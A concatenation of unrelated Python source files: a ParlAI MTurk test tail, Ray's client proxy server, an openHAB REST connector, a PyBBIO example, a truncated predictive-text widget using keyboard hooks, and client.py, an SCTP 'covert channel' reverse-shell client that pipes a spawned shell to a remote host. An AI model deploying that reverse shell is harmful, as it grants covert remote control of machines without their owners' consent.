), 3, 2)
def test_break_multi_convo(self):
manager = self.mturk_manager
manager.opt['allowed_conversations'] = 1
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Attempt to start a new conversation with duplicate worker 1
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(
lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
assert_equal_by(lambda: len(
[p for p in agent_1_2.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 2)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 3, 2)
def test_no_onboard_expire_waiting(self):
manager = self.mturk_manager
manager.set_onboard_function(None)
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
manager._expire_agent_pool()
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 2)
def test_return_to_waiting_on_world_start(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Make agent_1 no longer respond to change_conversation_requests
def replace_on_msg(packet):
agent_1.message_packet.append(packet)
agent_1.on_msg = replace_on_msg
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents attempt to move to task, but then move back to waiting
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 3)
agent_1.always_beat = False
# Assert no world ever started
self.assertNotIn(agent_2.worker_id, self.worlds_agents)
# Expire everything
manager.shutdown()
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
if __name__ == '__main__':
unittest.main(buffer=True)
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import psutil
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
session_dir: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self.redis_address = redis_address
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._session_dir: str = session_dir or ""
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
def _get_redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self.redis_address:
return self.redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self.redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self.redis_address
def _get_session_dir(self) -> str:
"""
Gets the session_dir of this running Ray session. This usually
looks like /tmp/ray/session_<timestamp>.
"""
if self._session_dir:
return self._session_dir
# Connect a driver to an already running cluster.
connection_tuple = ray.init(address=self._get_redis_address())
ray.shutdown()
self._session_dir = connection_tuple["session_dir"]
return self._session_dir
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
proc = start_ray_client_server(
self._get_redis_address(),
specific_server.port,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self._get_session_dir())
# Wait for the process being run transitions from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVGet")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config))
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server.err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# Before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield resp
def serve_proxier(connection_str: str,
redis_address: str,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(redis_address, session_dir)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
client.py
|
#!/usr/bin/python2
import argparse
from Crypto.Cipher import AES
import fcntl
import os
import pty
import sctp
import socket
import ssl
import sys
from subprocess import Popen, PIPE
import threading
sctp_socket = sctp.sctpsocket_tcp
# DISCLAIMER: this code is largely copied and refactored from gallopsled's excellent pwntools.
# Hat tip to them.
def interactive_recv_input(sock, std_in, bye_bye):
while not bye_bye.isSet():
# receive data and give it to the program's input:
try:
cur_data = sock.recv(1024)
if cur_data:
std_in.write(cur_data)
std_in.flush()
except EOFError:
print "EOF - terminating"
sys.exit(0)
def interactive_send_output(sock, std_out, bye_bye):
try:
while not bye_bye.isSet():
try:
data = std_out.read()
except IOError:
continue
if data:
try:
sock.send(data)
except (EOFError, socket.error) as e:
print "EOF - terminating"
bye_bye.set()
else:
bye_bye.set()
except KeyboardInterrupt:
print "CTRL + C pressed."
bye_bye.set()
def process_connection(sock, std_in, std_out, disable_encryption = False):
# connect connection's stdin to my stdin, connection's stdout to my stdout.
bye_bye = threading.Event()
read_thread = threading.Thread(target = interactive_recv_input, args = (sock, std_in, bye_bye))
read_thread.setDaemon(True)
read_thread.start()
interactive_send_output(sock, std_out, bye_bye)
while read_thread.is_alive():
read_thread.join(timeout = 0.1)
# END DISCLAIMER
def connect(host, port, disable_encryption = False):
sock = sctp_socket(family = socket.AF_INET)
sock.connect((host, port))
if disable_encryption:
std_out = sock.sock().makefile("w")
std_in = sock.sock().makefile()
shell = Popen(os.environ["SHELL"],
stdin = std_in,
stdout = std_out,
shell = True)
else:
ssl_sock = ssl.wrap_socket(sock.sock(),
ssl_version = ssl.PROTOCOL_TLSv1)
ssl_sock.send("Hi! This is the client. You're connected.\n")
r, w = os.pipe()
std_in = os.fdopen(r, "r")
std_out = os.fdopen(w, "w")
#Set our shell up to use pty, and make the output non-blocking.
master, slave = pty.openpty()
shell = Popen(os.environ["SHELL"],
stdin = PIPE,
stdout = slave,
shell = True)
shell.stdout = os.fdopen(os.dup(master), "r+")
fd = shell.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption)
sock.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = ("SCTP covert channel client. "
"FOR PROFESSIONAL PENTESTING USE ONLY."))
parser.add_argument("--host",
required = True,
help = "Server IP address.")
parser.add_argument("--port",
required = True,
help = "Server port.",
type = int)
parser.add_argument("--no-encryption",
help = "FOR DEBUGGING ONLY. Disables encryption",
action = "store_true")
args = parser.parse_args()
connect(host = args.host, port = args.port, disable_encryption = args.no_encryption)
|
rest_conn.py
|
# Copyright 2020 Richard Koshak
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Communicator that publishes and subscribes to openHAB's REST API.
Classes:
- openhab_rest: publishes state updates to openHAB Items.
"""
from threading import Thread, Timer
from configparser import NoOptionError
import json
import traceback
import requests
import sseclient
from core.connection import Connection
def connect_oh_rest(caller):
""" Subscribe to SSE events and start processing the events
if API-Token is provided and supported then include it in the request"""
try:
if caller.openhab_version >= 3.0 and bool(caller.api_token):
header = {'Authorization': 'Bearer ' + caller.api_token }
stream = requests.get("{}/rest/events".format(caller.openhab_url),
headers=header, stream=True)
else:
stream = requests.get("{}/rest/events".format(caller.openhab_url),
stream=True)
caller.client = sseclient.SSEClient(stream)
except requests.exceptions.Timeout:
caller.log.error("Timed out connecting to %s", caller.openhab_url)
except requests.exceptions.ConnectionError as ex:
caller.log.error("Failed to connect to %s, response: %s", caller.openhab_url, ex)
except requests.exceptions.HTTPError as ex:
caller.log.error("Received and unsuccessful response code %s", ex)
caller.reciever = OpenhabReciever(caller)
class OpenhabREST(Connection):
"""Publishes a state to a given openHAB Item. Expects there to be a URL
parameter set to the base URL of the openHAB instance. Subscribes to the OH
SSE feed for commands on the registered Items.
"""
def __init__(self, msg_processor, params):
"""Starts the SSE subscription and registers for commands on
RefreshItem. Expects the following params:
- "URL": base URL of the openHAB instance NOTE: does not support TLS.
- "RefreshItem": Name of the openHAB Item that, when it receives a
command will cause sensor_reporter to publish the most recent states of
all the sensors.
- msg_processor: message handler for command to the RefreshItem
"""
super().__init__(msg_processor, params)
self.log.info("Initializing openHAB REST Connection...")
self.openhab_url = params("URL")
self.refresh_item = params("RefreshItem")
self.registered[self.refresh_item] = msg_processor
# optional OpenHAB Verison and optional API-Token for connections with authentication
try:
self.openhab_version = float(params("openHAB-Version"))
except NoOptionError:
self.log.info("No openHAB-Version specified, falling back to version 2.0")
self.openhab_version = 2.0
if self.openhab_version >= 3.0:
try:
self.api_token = params("API-Token")
except NoOptionError:
self.api_token = ""
if not bool(self.api_token):
self.log.info("No API-Token specified,"
" connecting to openHAB without authentication")
self.client = None
self.reciever = None
connect_oh_rest(self)
def publish(self, message, destination, filter_echo=False):
"""Publishes the passed in message to the passed in destination as an update.
Handle filter_echo=True the same way as usual publishing of messages
since openHAB won't send an status update to all subcribers"""
self.reciever.start_watchdog()
try:
self.log.debug("Publishing message %s to %s", message, destination)
# openHAB 2.x doesn't need the Content-Type header
if self.openhab_version < 3.0:
response = requests.put("{}/rest/items/{}/state"
.format(self.openhab_url, destination),
data=message, timeout=10)
else:
# define header for OH3 communication and authentication
header = {'Content-Type': 'text/plain'}
if bool(self.api_token):
header['Authorization'] = "Bearer " + self.api_token
response = requests.put("{}/rest/items/{}/state"
.format(self.openhab_url, destination),
headers=header, data=message, timeout=10)
response.raise_for_status()
self.reciever.activate_watchdog()
except ConnectionError:
self.log.error("Failed to connect to %s\n%s", self.openhab_url,
traceback.format_exc())
except requests.exceptions.Timeout:
self.log.error("Timed out connecting to %s", self.openhab_url)
except requests.exceptions.ConnectionError as ex:
#handes exception "[Errno 111] Connection refused"
# which is not caught by above "ConnectionError"
self.log.error("Failed to connect to %s, response: %s", self.openhab_url, ex)
except requests.exceptions.HTTPError as ex:
self.log.error("Received and unsuccessful response code %s", ex)
def disconnect(self):
"""Stops the event processing loop."""
self.log.info("Disconnecting from openHAB SSE")
self.reciever.stop()
class OpenhabReciever():
"""Initiates a separate Task for recieving OH SSE.
"""
def __init__(self, caller):
self.stop_thread = False
# copy reciever object to local class
self.client = caller.client
self.caller = caller
self.watchdog = None
self.watchdog_activ = False
# in case of a connection error dont start the get_messages thread
if self.client:
self.thread = Thread(target=self._get_messages, args=(caller,))
self.thread.start()
def _get_messages(self, caller):
"""Blocks until stop is set to True. Loops through all the events on the
SSE subscription and if it's a command to a registered Item, call's that
Item's handler.
"""
for event in self.client.events():
# reset reconnect watchdog
if self.watchdog:
self.watchdog.cancel()
if self.stop_thread:
self.client.close()
caller.log.debug("Old OpenHab connection closed")
return
# See if this is an event we care about. Commands on registered Items.
decoded = json.loads(event.data)
if decoded["type"] == "ItemCommandEvent":
# openHAB 2.x locates the items on a different url
if caller.openhab_version < 3.0:
item = decoded["topic"].replace("smarthome/items/",
"").replace("/command", "")
else:
item = decoded["topic"].replace("openhab/items/",
"").replace("/command", "")
if item in caller.registered:
payload = json.loads(decoded["payload"])
msg = payload["value"]
caller.log.info("Received command from %s: %s", item, msg)
caller.registered[item](msg)
def _wd_timeout(self):
"""watchdog handler: will reconnect to openhab when invoced"""
if self.watchdog_activ:
self.caller.log.info("connection EXPIRED, reconnecting")
self.stop()
connect_oh_rest(self.caller)
def start_watchdog(self):
"""start watchdog before msg gets sent to openhabREST
if the watchdog gets activated and after 2s no msg from openHAB was
received the connection gets reseted
"""
if self.watchdog:
self.watchdog.cancel()
self.watchdog_activ = False
self.watchdog = Timer(2, self._wd_timeout)
self.watchdog.start()
def activate_watchdog(self):
"""enable watchdog after msg was succesful send (no exeption due to connection error)
avoids a reconnect atempt when the connection was unsuccessful
"""
self.watchdog_activ = True
def stop(self):
"""Sets a flag to stop the _get_messages thread and to close the openHAB connection.
Since the thread itself blocks until a message is recieved we won't wait for it
"""
self.stop_thread = True
|
SafeProcess_test.py
|
#!/usr/bin/env python
"""
SafeProcess_test.py
Alexander Hiam
An example to demonstrate the use of the SafeProcess library
for PyBBIO.
This example program is in the public domain.
"""
from bbio import *
from bbio.libraries.SafeProcess import *
def foo():
while(True):
print "foo"
delay(1000)
def setup():
p = SafeProcess(target=foo)
p.start()
def loop():
print "loop"
delay(500)
run(setup, loop)
|
echotext.py
|
# echotext Version 1.1 by Neil Flodin
#
# A simply widget that uses predictive text analysis to provide
# user customized predictive text input, similar to that seen now
# on many smartphones.
#
# The text of the MIT license is below.
#
#
# Copyright (c) 2015 Neil Flodin <neil@neilflodin.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Tkinter library used for GUI
from tkinter import *
# Specifically import these separate tkinter modules
import tkinter.messagebox
import tkinter.commondialog
'''
# These are used to query Princeton's WordNet for parts of speech in order to make more educated guesses
from bs4 import BeautifulSoup
import requests
import urllib
'''
# For easy, good file IO as well as web interfacing (maybe)
import json
import os
# Used to get monitor information when placing the window
import win32con
'''
# Word part of speech tagging, just a great general-usage natural language processor
import nltk
# Load nltk components
try:
nltk.data.find("taggers/averaged_perceptron_tagger.zip")
except LookupError:
nltk.download("averaged_perceptron_tagger")
try:
nltk.data.find("tokenizers/punkt.zip")
except LookupError:
nltk.download("punkt")
'''
# I <3 multithreading (Used for update_sources_masterobject)
import threading
# Sleep function
import time
# Get file:// URIs
import pathlib
# String splitting
import re
# Keylogging components
import pyHook
# Keyboard entry simulation
import ctypes
import win32api
MAPVK_VK_TO_VSC = 0
MAPVK_VSC_TO_VK = 1
MAPVK_VK_TO_CHAR = 2
MAPVK_VSC_TO_VK_EX = 3
MAPVK_VK_TO_VSC_EX = 4
KLF_ACTIVATE = 1,
KLF_SUBSTITUTE_OK = 2
KLF_REORDER = 8
KLF_REPLACELANG = 0x10
KLF_NOTELLSHELL = 0x80
KLF_SETFORPROCESS = 0x00100
KLF_SHIFTLOCK = 0x10000
KLF_RESET = 0x40000000
SendInput = ctypes.windll.user32.SendInput
PUL = ctypes.POINTER(ctypes.c_ulong)
class KeyBdInput(ctypes.Structure):
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
